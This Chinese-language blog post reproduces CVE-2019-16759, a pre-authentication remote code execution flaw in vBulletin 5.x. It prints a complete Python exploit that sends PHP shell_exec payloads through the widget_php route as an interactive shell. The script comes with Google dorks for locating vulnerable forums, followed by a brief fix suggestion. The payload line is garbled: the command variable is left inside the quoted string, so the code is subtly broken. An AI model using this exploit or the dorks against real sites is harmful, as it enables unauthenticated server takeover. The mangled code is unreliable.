关注我们

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE 漏洞复现

遇梦遇梦 安全文摘 2019-09-28 269162 0

0X1 漏洞概述

vBulletin 是世界上用户非常广泛的PHP论坛,很多大型论坛都选择vBulletin作为自己的社区。vBulletin高效,稳定,安全,在中国也有很多大型客户,比如X鸟网,XX团购等在线上万人的论坛都用vBulletin。

vBulletin的官方网站是 http://www.vBulletin.com 它不是免费软件,但价格很低。的公司网站和论坛。因此,该0day漏洞细节的公布会对大量的用户带来影响。


匿名黑客称发现vBulletin中存在一个远程代码执行漏洞,影响vBulletin v 5.0.0到最新的v 5.5.4版本。该漏洞非常严重的原因不仅在于可以远程利用,还在于漏洞利用并不需要认证。由于论坛软件包是内部 widget文件通过URL参数接收配置的方式存在漏洞,服务器在分析参数时又没有进行适当的安全检查


漏洞POC参考:https://seclists.org/fulldisclosure/2019/Sep/31

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
    try:
        cmd = raw_input("vBulletin$")
        params["widgetConfig[code]"] = "echo shell_exec('cmd+'); exit;"
        r = requests.post(url = sys.argv[1], data = params)
        if r.status_code == 200:
            print r.text
        else:
            sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
        sys.exit("\nClosing shell...")
    except Exception, e:
        sys.exit(str(e))

0X2 环境搭建

由于vBulletin需要一些$才能下载源码,找了一下发现网上可以下载的是4.x的代码,无法复现。而该项目维护人员目前还并没有发布更新补丁,官网的测试版本还是最新的5.5.4,因此使用在线测试环境测试。漏洞原理分析可以参考chybeta在先知上做的分析。在官网上填写邮箱,即可得到测试版地址,如下所示

https://www.vbulletin.com/en/vb5-trial/

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE 漏洞复现

0X3 漏洞复现

使用上面的poc代码测试demo环境,可以看到返回条件成功

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE 漏洞复现

也可参考chybeta的复现过程进行代码注入执行

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE 漏洞复现

CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE 漏洞复现

0X4 漏洞修复

    建议对includes\vb5\frontend\controller\bbcode.php中的变量evalCode做过滤防护

0x5 参考文章

    https://xz.aliyun.com/t/6419

    https://seclists.org/fulldisclosure/2019/Sep/31

文由安全漏洞环境学习

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址